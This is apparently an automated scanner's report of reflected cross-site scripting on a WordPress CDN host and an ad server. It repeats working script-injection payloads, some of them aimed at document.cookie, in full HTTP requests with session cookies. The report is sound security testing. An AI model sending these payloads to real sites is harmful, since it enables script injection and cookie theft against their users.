GET /wp-content/plugins21ed3"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41abd"><script>alert(1)</script>143b5139f95 was submitted in the REST URL parameter 4. This input was echoed as 41abd\"><script>alert(1)</script>143b5139f95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/sidebar-login/style.css41abd"><script>alert(1)</script>143b5139f95?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c07"><script>alert(1)</script>ac1ebf8b1b6 was submitted in the REST URL parameter 1. This input was echoed as 23c07\"><script>alert(1)</script>ac1ebf8b1b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content23c07"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b95"><script>alert(1)</script>57b77ffa238 was submitted in the REST URL parameter 2. This input was echoed as f3b95\"><script>alert(1)</script>57b77ffa238 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesf3b95"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8f9"><script>alert(1)</script>bd1c2d36605 was submitted in the REST URL parameter 6. This input was echoed as cd8f9\"><script>alert(1)</script>bd1c2d36605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9"><script>alert(1)</script>bd1c2d36605 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e0"><script>alert(1)</script>27728feb339 was submitted in the REST URL parameter 1. This input was echoed as 646e0\"><script>alert(1)</script>27728feb339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content646e0"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57026"><script>alert(1)</script>74b1e57ccc9 was submitted in the REST URL parameter 2. This input was echoed as 57026\"><script>alert(1)</script>74b1e57ccc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes57026"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b46e"><script>alert(1)</script>5ec3496cd24 was submitted in the REST URL parameter 5. This input was echoed as 2b46e\"><script>alert(1)</script>5ec3496cd24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/atahualpa/js/DD_roundies.js2b46e"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398c9"><script>alert(1)</script>4e487c44e11 was submitted in the REST URL parameter 1. This input was echoed as 398c9\"><script>alert(1)</script>4e487c44e11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes398c9"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e502"><script>alert(1)</script>87deeb2ec4f was submitted in the REST URL parameter 3. This input was echoed as 5e502\"><script>alert(1)</script>87deeb2ec4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/l10n.js5e502"><script>alert(1)</script>87deeb2ec4f?ver=20101110 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd65"><script>alert(1)</script>dfef0ede538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cc0"><script>alert(1)</script>b9e470def13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:35 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d4f"><script>alert(1)</script>91bcd1e71d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23a8d4f"><script>alert(1)</script>91bcd1e71d8?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e43"-alert(1)-"2c71c5674a2 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:31 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2438 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2";
3.52. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dm.de.mookie1.com
Path: /2/B3DM/2010DM/12086108130@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86c4"-alert(1)-"968eecc14d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:32 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6939f"><script>alert(1)</script>d229212c062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:28 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7757"><script>alert(1)</script>67578923dc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:30 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>45420a5298d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23db149"><script>alert(1)</script>45420a5298d?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bcfc"-alert(1)-"38d19f0405 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:27 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2437 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405";
3.57. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dm.de.mookie1.com
Path: /2/B3DM/2010DM/1377241392@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"d96185b3a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:27 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a88"><script>alert(1)</script>4134ea3c517 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:45 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb87"><script>alert(1)</script>cb041db047f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:47 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8df"><script>alert(1)</script>c890c99deb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
